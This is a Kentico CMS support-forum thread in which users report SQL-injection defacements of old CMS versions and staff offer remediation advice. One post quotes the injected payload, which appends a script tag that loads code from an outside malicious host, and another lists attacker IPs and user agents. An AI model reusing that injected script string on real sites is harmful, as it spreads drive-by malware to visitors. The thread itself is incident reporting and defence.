|
|
Member
|
random0xff
-
5/28/2009 3:07:19 PM
SQL Injection
I was just wondering, what does Kentico CMS do to avoid SQL injection attacks? For instance, if a querystring parameter is used in a SQL WHERE statement. I see that many methods in the API expect a 'where' argument to be passed in. Is that argument checked at all? Should we do the checking ourselves?
Having used ADO.NET I know that with parameterized command I have nothing to worry about. Using Kentico I don't feel so sure. So please elaborate on this subject!
Thanks!
|
|
|
|
Kentico Support
|
kentico_jurajo
-
5/29/2009 4:44:37 AM
RE:SQL Injection
Hello,
We are checking our code against SQL injection, XSS ans XSRF attacks and other types of attackes.
It also depends on your custom code if it is following some coding rules to avoid these kind of attacks.
At this moment we are not aware of any SQL injection problem in the CMS default code.
Best Regards,
Juraj Ondrus
|
|
|
|
|
Member
|
random0xff
-
5/31/2009 10:14:47 AM
RE:SQL Injection
Ok, so eveything I put in the where argument is checked? I don;t have to check querystring inout before I put it into the where string that I pass to TreeHelper.SelectNodes()?
|
|
|
|
Kentico Developer
|
kentico_zbysekn
-
6/1/2009 9:43:51 AM
RE:SQL Injection
Hi,
It should be checked in API and all our controls. In case you have find some place where could be possible "hole" to the system or weak spot, please let us know so we can solve this problem.
Best Regards,
Zbysek Nemec.
|
|
|
|
Member
|
JeroenMol
-
8/2/2012 5:17:02 AM
RE:SQL Injection
There is a hole somewhere. My client uses v4.0 and two days again the complete CMS_Query table was changed with unwanted URLs. After restoring that table, the site was still showing issues. When we restored the complete database (So it seems that not only the CMS_Query was changed), the site was running again... till the next attack :(
Please what to do. How can we prevent this?
|
|
|
|
|
Kentico Support
|
kentico_jurajo
-
8/2/2012 5:25:44 AM
RE:SQL Injection
Hi,
You are using version released several years ago - since then, the attack methods changed and improved - so you should consider upgrading the CMS to the latest version. It is the same as if you do not update your anti-virus program.
Also, it would be good to know from where the attack came - which page, what is on the page and so on. In most cases some customizations were made and the code was not SQL injection and other attacks safe.
Best regards,
Juraj Ondrus
|
|
|
|
Member
|
webservices@marketingimages.com
-
8/3/2012 11:56:03 AM
RE:SQL Injection
We also have an old client site in v4.0 that got hit by the same SQL injection attack. We cleaned the database out manually only to have it hit again the next night. The second attack was much more thorough with injecting data into the SQL database so we are going to be restoring from back-up. We would really like to find a solution that we can apply as soon as the restoration is completed so we don't have to go through this process again.
We are guessing it was pushed in through the site search box on the home page. Does that seem like a reasonable culprit to you? Would applying the latest v4.0.15 hotfix help with this issue?
Regards,
John
|
|
|
|
|
Member
|
JeroenMol
-
8/3/2012 12:24:23 PM
RE:SQL Injection
Hi John,
I installed the v4.0.15 hotfix, but then I received another error, so I de-installed it again.
Let's keep each other informed about the process and what we find. Today I had an attack in the morning (between 08:00 and 09:30 (GMT+1)) and in the evening around 18:00. I'm getting handy in restoring the database, but this not the way and we need a solution fast.
We don't have that many custom code inside Kentico and we are using stored procedures (from 2004).
Best regards,
Jeroen (jmol@outlook.com)
|
|
|
|
|
Kentico Support
|
kentico_jurajo
-
8/5/2012 8:43:51 AM
RE:SQL Injection
Hi,
If you could use some security audit tools - e.g. to get some reports for the weak points on your web site - so we can see which page and what functionality enabled the attack, that would be great.
However, I would highly recommend to consider the upgrade to the newest version of Kentico CMS - if there is a hole, hotfixes are released for the latest version only so you will have to upgrade anyway.
Best regards,
Juraj Ondrus
|
|
|
|
|
Member
|
webservices@marketingimages.com
-
8/16/2012 4:00:45 PM
RE:SQL Injection
We have a search for the calendar of events on the site and it appears that the keyword search there is the likely culprit.
|
|
|
|
|
Kentico Support
|
kentico_jurajo
-
8/19/2012 12:12:55 AM
RE:SQL Injection
Hi,
Is it a built in search or custom search?
Are you using the SQL search?
If it is a custom search - how are you working with the entered values? Are you escaping them and also making sure they are SQL injection proof using available methods and techniques?
Best regards,
Juraj Ondrus
|
|
|
|
|
Member
|
egarrison-wte
-
10/7/2012 8:23:34 PM
RE:SQL Injection
Kentico,
I am concerned this is a more common issue. We have been contacted to clean up a Kentico 6.0.40 site. This site isn't even using Kentico Search. Their site search is via a 3rd party external service. This site appears to have the same issue that JeroenMol is talking about.
I think it happened via the Forms or some other type of postback. How does Kentico pass PCI Scanning without some handler for SQL Injections?
This site has had every QueryName in table CMS_Query appended with "> </title><script src="http://inent17alexe.rr.nu/sl.php?v=2"></script><!--"
It would appear that the injection likely happened via a Newsletter Signup on the form post.
Eric
|
|
|
|
|
Kentico Support
|
kentico_jurajo
-
10/8/2012 1:45:38 AM
RE:SQL Injection
Hi,
You need to find out which page was used for this attack and what is on that page. Very common issue is that query string parameters are used but they are not sanitized - this is the administrator or developer thing to be aware of the risks and use e.g. just integer values and use the query string macro to accept only integers and so on.
At this moment, we are not aware of any holes in the CMS v6 or v7. So far what was reported, it was always not following the security best practices or using 3rd party tools.
Best regards,
Juraj Ondrus
|
|
|
|
|
Member
|
egarrison-wte
-
10/8/2012 6:54:23 PM
RE:SQL Injection
I am posting this in help that maybe someone else has seen similar or more. The Kentico 6 site's log shows that it may have happened via Newsletter Signup Webpart or Blog Comment Webpart. It also looks like they first run Xenu on the site to find the expoits. From the Event Log" Xenu Link Sleuth/1.3.8"
Here is the IP and User Agent of the device that corrupted my client's site.
198.144.112.5
Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)
Blog:
198.144.112.6
Mozilla/4.0 (compatible; Synapse)
|
|
|
|
Kentico Consulting
|
kentico_borisp
-
10/9/2012 2:18:26 AM
RE:SQL Injection
Hello,
On a more general note, a place, where you can check to find out, on which page was used for executing the SQLInjection is the IIS log on your server. The page request is usually resulting in an error or contains a part of the SQL query. It is usually also one of the longer URLs.
Best regards,
Boris Pocatko
|
|